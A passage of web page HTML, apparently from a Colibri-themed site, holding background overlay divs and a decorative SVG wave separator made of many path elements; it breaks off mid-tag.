<div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path 